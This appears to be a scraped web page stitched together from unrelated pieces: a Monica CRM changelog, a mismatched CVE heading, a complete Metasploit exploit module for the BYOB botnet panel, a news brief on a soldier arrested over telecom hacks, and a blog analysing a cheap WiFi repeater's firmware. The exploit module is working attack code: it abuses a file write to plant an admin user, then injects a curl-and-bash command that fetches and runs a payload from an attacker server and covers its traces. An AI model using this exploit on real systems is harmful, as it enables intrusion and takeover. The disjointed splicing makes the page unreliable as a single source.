*   export data as json format (#4779) (8c627a2)
*   implement laravel password strength (#5821) (8295be3)
*   improve reliability of pingversion (#5723) (0c791f6)
*   order introductions contact list by first and last name (#5102) (6ff0738)
*   quick add with email (#5182) (80001fc)
*   re-activate adorable avatars with permanent solution (#5872) (ccf6d4f)
*   sync carddav delete contact requests (#5835) (30d97f9)

**Bug Fixes**

*   add link to reminders endpoint at api root (#5801) (337367a)
*   fix Date display with timezone (#5825) (d73e3c4)
*   version display on heroku (#5860) (0cf965f)

**v3.5.0**

**v3.4.0**

**3.4.0 (2021-10-31)****Features**

*   add dependencies node and yarn in Dockerfile (#5635) (48726b5)
*   added URLs to be exported in vCards. (#5609) (38429a2)
*   get weather from weatherapi (#5668) (d19b6ad)
*   retry get gps coordinate when rate limited second (#5615) (8eed44e)
*   searchable contacts on introductions form (#5632) (cc05552)
*   update last called attribute (#5614) (83e1d68)

**Bug Fixes**

*   fix carddav addressbook add (#5660) (ac44cfb)
*   fix creating default gender (#5607) (6c5ac48)
*   fix distant contact etag handle (#5605) (1da427f)
*   fix duplicate reminders on dashboard (#5569) (bb97115)
*   fix edit an activity with a category (#5661) (9128db8)
*   fix gift api without passport (#5664) (7939a5f)
*   fix import table layout (#5662) (cd138c8)
*   fix vcard company import (#5616) (0dd4b23)

**v3.3.1**

CVE-2023-50465: Releases · monicahq/monica

This Metasploit module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI. It leverages an unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user. It also uses an authenticated command injection in the payload generation page. These vulnerabilities remain unpatched.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'sqlite3'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'BYOB Unauthenticated RCE via Arbitrary File Write and Command Injection (CVE-2024-45256, CVE-2024-45257)',        'Description' => %q{          This module exploits two vulnerabilities in the BYOB (Build Your Own Botnet) web GUI:          1. CVE-2024-45256: Unauthenticated arbitrary file write that allows modification of the SQLite database, adding a new admin user.          2. CVE-2024-45257: Authenticated command injection in the payload generation page.          These vulnerabilities remain unpatched.        },        'Author' => [          'chebuya',          # Discoverer and PoC          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-45256'],          ['CVE', '2024-45257'],          ['URL', 'https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/']        ],        'Platform' => %w[unix linux],        'Arch' => %w[ARCH_CMD],        'Targets' => [          [            'Unix/Linux Command Shell', {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD,              'Privileged' => true              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DisclosureDate' => '2024-08-15',        'DefaultTarget' => 0,        'DefaultOptions' => { 'SRVPORT' => 5000 },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options(      [        OptString.new('USERNAME', [false, 'Username for new admin', 'admin']),        OptString.new('PASSWORD', [false, 'Password for new admin', nil])      ]    )  end  def primer    add_resource('Path' => '/', 'Proc' => proc { |cli, req| on_request_uri_payload(cli, req) })    print_status('Payload is ready at /')  end  def on_request_uri_payload(cli, request)    handle_request(cli, request, payload.encoded)  end  def handle_request(cli, request, response_payload)    print_status("Received request at: #{request.uri} - Client Address: #{cli.peerhost}")    case request.uri    when '/'      print_status("Sending response to #{cli.peerhost} for /")      send_response(cli, response_payload)    else      print_error("Request for unknown resource: #{request.uri}")      send_not_found(cli)    end  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path),      'keep_cookies' => true    })    if res      doc = res.get_html_document      unless doc.at('title')&.text&.include?('Build Your Own Botnet') || doc.at('meta[name="description"]')&.attr('content')&.include?('Build Your Own Botnet')        return CheckCode::Safe('The target does not appear to be BYOB.')      end    else      return CheckCode::Unknown('The target did not respond to the initial check.')    end    print_good('The target appears to be BYOB.')    random_data = Rex::Text.rand_text_alphanumeric(32)    random_filename = Rex::Text.rand_text_alphanumeric(16)    random_owner = Rex::Text.rand_text_alphanumeric(8)    random_module = Rex::Text.rand_text_alphanumeric(6)    random_session = Rex::Text.rand_text_alphanumeric(6)    form_data = {      'data' => random_data,      'filename' => random_filename,      'type' => 'txt',      'owner' => random_owner,      'module' => random_module,      'session' => random_session    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => form_data,      'keep_cookies' => true    })    if res&.code == 500      return CheckCode::Vulnerable    else      case res&.code      when 200        return CheckCode::Safe      when nil        return CheckCode::Unknown('The target did not respond.')      else        return CheckCode::Unknown("The target responded with HTTP status #{res.code}")      end    end  end  def get_csrf(path)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, path),      'keep_cookies' => true    })    fail_with(Failure::UnexpectedReply, 'Could not retrieve CSRF token') unless res    csrf_token = res.get_html_document.at_xpath("//input[@name='csrf_token']/@value")&.text    fail_with(Failure::UnexpectedReply, 'CSRF token not found') if csrf_token.nil?    csrf_token  end  def register_user(username, password)    csrf_token = get_csrf('register')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'register'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'csrf_token' => csrf_token,        'username' => username,        'password' => password,        'confirm_password' => password,        'submit' => 'Sign Up'      },      'keep_cookies' => true    })    if res.nil?      fail_with(Failure::UnexpectedReply, 'No response from the server.')    elsif res.code == 302      print_good('Registered user!')    else      fail_with(Failure::UnexpectedReply, "User registration failed: #{res.code}")    end  end  def login_user(username, password)    csrf_token = get_csrf('login')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'login'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'csrf_token' => csrf_token,        'username' => username,        'password' => password,        'submit' => 'Log In'      },      'keep_cookies' => true    })    if res.nil?      fail_with(Failure::UnexpectedReply, 'No response from the server.')    elsif res.code == 302      print_good('Logged in successfully!')    else      fail_with(Failure::UnexpectedReply, "Login failed: #{res.code}")    end  end  def generate_malicious_db    mem_db = SQLite3::Database.new(':memory:')    mem_db.execute <<-SQL            CREATE TABLE user (            id INTEGER NOT NULL,            username VARCHAR(32) NOT NULL,            password VARCHAR(60) NOT NULL,            joined DATETIME NOT NULL,            bots INTEGER,            PRIMARY KEY (id),            UNIQUE (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE session (            id INTEGER NOT NULL,            uid VARCHAR(32) NOT NULL,            online BOOLEAN NOT NULL,            joined DATETIME NOT NULL,            last_online DATETIME NOT NULL,            public_ip VARCHAR(42),            local_ip VARCHAR(42),            mac_address VARCHAR(17),            username VARCHAR(32),            administrator BOOLEAN,            platform VARCHAR(5),            device VARCHAR(32),            architecture VARCHAR(2),            latitude FLOAT,            longitude FLOAT,            new BOOLEAN NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (uid),            UNIQUE (uid),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE payload (            id INTEGER NOT NULL,            filename VARCHAR(34) NOT NULL,            operating_system VARCHAR(3),            architecture VARCHAR(14),            created DATETIME NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (id),            UNIQUE (filename),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE exfiltrated_file (            id INTEGER NOT NULL,            filename VARCHAR(4096) NOT NULL,            session VARCHAR(15) NOT NULL,            module VARCHAR(15) NOT NULL,            created DATETIME NOT NULL,            owner VARCHAR(120) NOT NULL,            PRIMARY KEY (id),            UNIQUE (filename),            FOREIGN KEY(owner) REFERENCES user (username)            );    SQL    mem_db.execute <<-SQL            CREATE TABLE task (            id INTEGER NOT NULL,            uid VARCHAR(32) NOT NULL,            task TEXT,            result TEXT,            issued DATETIME NOT NULL,            completed DATETIME,            session VARCHAR(32) NOT NULL,            PRIMARY KEY (id),            UNIQUE (uid),            FOREIGN KEY(session) REFERENCES session (uid)            );    SQL    base64_data = Tempfile.open('database.db') do |file|      src_db = SQLite3::Database.new(file.path)      backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')      backup.step(-1)      backup.finish      binary_data = File.binread(file.path)      Rex::Text.encode_base64(binary_data)    end    base64_data  end  def upload_database_multiple_paths    successful_paths = []    filepaths = [      '/proc/self/cwd/buildyourownbotnet/database.db',      '/proc/self/cwd/../buildyourownbotnet/database.db',      '/proc/self/cwd/../../../../buildyourownbotnet/database.db',      '/proc/self/cwd/instance/database.db',      '/proc/self/cwd/../../../../instance/database.db',      '/proc/self/cwd/../instance/database.db'    ]    filepaths.each do |filepath|      form_data = {        'data' => @encoded_db,        'filename' => filepath,        'type' => 'txt',        'owner' => Faker::Internet.username,        'module' => Faker::App.name.downcase,        'session' => Faker::Alphanumeric.alphanumeric(number: 8)      }      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'api', 'file', 'add'),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => form_data,        'keep_cookies' => true      )      successful_paths << filepath if res&.code == 200    end    successful_paths  end  def on_new_session(session)    if session.type == 'meterpreter'      binary_content = Rex::Text.decode_base64(@encoded_db)      print_status('Restoring the database via Meterpreter to avoid leaving traces.')      successful_restore = false      @successful_paths.each do |remote_path|        remote_file = session.fs.file.new(remote_path, 'wb')        remote_file.syswrite(binary_content)        remote_file.close        successful_restore = true      end      if successful_restore        print_good('Database has been successfully restored to its clean state.')      else        print_error('Failed to restore the database on all attempted paths, but proceeding with the exploitation.')      end    else      print_error('This is not a Meterpreter session. Cannot proceed with database reset, but exploitation continues.')    end  end  def exploit    # Start necessary services and perform initial setup    start_service    primer    # Define or generate admin credentials    username = datastore['USERNAME'] || 'admin'    password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)    # Generate and upload the malicious SQLite database    print_status('Generating malicious SQLite database.')    @encoded_db = generate_malicious_db    @successful_paths = upload_database_multiple_paths    if @successful_paths.empty?      fail_with(Failure::UnexpectedReply, 'Failed to upload the database from all known paths')    else      print_good("Malicious database uploaded successfully to the following paths: #{@successful_paths.join(', ')}")    end    # Register the new admin user    print_status("Registering a new admin user: #{username}:#{password}")    register_user(username, password)    # Log in with the newly created admin user    print_status('Logging in with the new admin user.')    login_user(username, password)    # Prepare the malicious payload and inject it via command injection    print_status('Injecting payload via command injection.')    uri = get_uri.gsub(%r{^https?://}, '').chomp('/')    random_filename = ".#{Rex::Text.rand_text_alphanumeric(rand(3..5))}"    malicious_filename = "curl$IFS-k$IFS@#{uri}$IFS-o$IFS#{random_filename}&&bash$IFS#{random_filename}"    payload_data = {      'format' => 'exe',      'operating_system' => "nix$(#{malicious_filename})",      'architecture' => 'amd64'    }    # Send the command injection request    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'api', 'payload', 'generate'),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => payload_data,      'keep_cookies' => true    }, 5)    # Keep the web server running to maintain the service    service.wait  endend

BYOB Unauthenticated Remote Code Execution

Wagenius posted about hacking more than 15 telecom providers on the Telegram messaging service.

Source: Gregg Vignal via Alamy Stock Photo

NEWS BRIEF

A US Army soldier was reportedly arrested Dec. 20 in Texas and charged with two counts of unlawful transfer of confidential phone records.  

Cameron John Wagenius, 20, is suspected of leaking presidential call logs belonging to AT&T and Verizon under an online alias of "Kiberphant0m."

Wagenius was initially flagged as being involved in the Snowflake hacking campaign along with Connor Riley Moucka, also known as "Judische," who was arrested last October as part of the Snowflake account hacking.

Kiberphant0m reportedly published stolen call logs for former President Donald Trump and Vice President Kamala Harris after Moucka was arrested, as well as offered data schema from the National Security Agency, call logs from US government agencies, and a SIM-swapping Verizon service.

He also posted on Telegram about hacking more than 15 telecom providers and maintaining a distributed denial-of-service botnet.

An indictment alleges that Wagenius was involved in the sale and transmission of confidential phone records; no further details have been released regarding his connection to the Snowflake attacks.

**About the Author**

Skilled writer and editor covering cybersecurity for Dark Reading.

US Soldier Arrested in Verizon, AT&amp;T Hacks

Aigital Wireless-N Repeater Mini_Router v0.131229 was discovered to contain a remote code execution (RCE) vulnerability via the sysCmd parameter in the formSysCmd function. This vulnerability is exploited via a crafted HTTP request.

A few years ago I got an old WiFi repeater from a friend. I did not have any use for it at the time and I ended up chucking it into a corner of my house. A few days ago when I decided to study it a bit and unsurprisingly I discovered it is not very secure, so I decided to make a blog post to show how fun it can be to analyze this kind of device.

The device in question is an Aigital Wifi Repeater, shown below in all its glory.

**Web app analysis**

The repeater comes with a web interface, which is a pretty common feature with these types of devices. To find the first vulnerability we don’t even have to use any sophisticated tool or special technique, we just need to log in one time to realize that, once a legitimate user is logged in, any other user who can reach the web interface is logged in by default! As a matter of fact, inspecting the HTTP requests, we can see that no session cookie is used and that a time-based mechanism is handling the authentication instead. This would give an attacker an easy way to **bypass the login**.

From the same web interface we can even download **plain text credentials** from /config.dat

and we also have a **stored XSS** in the SSID field. So, that’s it, right? Judging from what we’ve seen so far, I don’t think so. Now let’s open the device and see what’s inside.

**Hardware analysis + firmware dump**

For this device, we will skip the recon phase, since everything we need is available right in front of our eyes as soon as we remove the plastic cover. We can quickly recognize an SPI flash memory and, with the help of a multimeter, we are able to identify the UART interface, which is for sure the first thing we want to try to access the device.

As a next step, we use a logic analyzer to identify all the parameters we will need to interface with the UART. To do that, we connect the device UART TX pin to channel one (in this case) of our logic analyzer and the GND of the UART to the logic analyzer’s GND pin. We then boot up the device and get the signal shown in the image:

As shown above, the width of the smallest piece of information received from the device is 26µs, which corresponds to 38400 bits/s baudarate. At this point, we can set this information in the logic analyzer software to check if we are receiving meaningful data from the device.

We zoom out and… Yes! we are receiving the boot logs. Now it’s time to try to interact with the UART and see what we can do. To do that I used the brand new, yet-to-be-released Bruschetta Board by Luca Bongiorni which handles UART, JTAG, SPI, I2C and uses level shifters so that we can work with devices at different voltages. In this case we have a 3.3V TX, so we just have to set the jumper on the Bruschetta with the correct voltage, connect the TX,RX,GND accordingly and launch the screen application on a Ubuntu machine as follows:

     screen -L uart.log /dev/ttyUSB0 38400
    

We get a lot of interesting information from the boot logs but unfortunately we do not get a shell, which is password protected.

After a few attempts to login in with typical weak admin/password combinations, I gave up and turned all my hopes to the SPI we saw earlier, I desoldered the flash memory and used Bruschetta again to dump the firmware inside.

Using flashrom and the command

    sudo ./flashrom -p ch347spi -r ../../AIGITAL/aigital-dump.bin
    

I finally obtained something. Let’s run binwalk to check what we got:

Good! We can see that we obtained a Squashfs filesystem, a typical tiny Linux filesystem often used for embedded devices. Now let’s extract the filesystem and see what we can find.

    binwalk -e aigital-dump.bin
    

**Firmware analysis + RCE**

From our initial web application analysis, we already know that the web server in use is Boa, an open source software typically used by embedded systems. We can find the binary of the web server in _aigital-dump.bin.extracted/squashfs-root/bin/boa and then open it with Ghidra letting the tool analyze the binary for us.

Once Ghidra is ready, the first thing we want to do (since we are most interested in finding RCE vulnerabilities), is to look if, where and how the system function is called. To get this information we can search the system function in the _Functions_ window and then use the _Function Call Graph_ to have a better understanding:

After some code analysis, I found that the function **FUN\_00440290** is an excellent candidate for what we are looking for. The parameter name “sysCmd” is a big hint, and it is also evident that the function does not properly handle user input before feeding it in a system command.

To reconstruct the whole HTTP call, you simply have to compare this function with the others we can see inspecting the web application: all the POST functions follow the structure /boafrm/<formName>. To understand which is the _formName_ in this case we just have to search for sysCmd and we will quickly find a reference to **formSyscmd** function in the form as a string stored in the binary. It should be noted that this functionality is not actually present in any of the forms of the web application but, as often happens, the code is reused without first being stripped of the functions that are not needed. This makes things more interesting for us since we have thus obtained an RCE, as show from the image below.

**Conclusions**

Cheap devices like this are a lot of fun to explore and can be used to do some experiments. I am sure there would be much more to analyze but, to be completely honest, in re-soldering the SPI last time I blew a PCB trace and so for now my experiments on this device are over :D. **Thanks for reading**

Search

lenovo warranty check/lookup | check warranty status | lenovo support us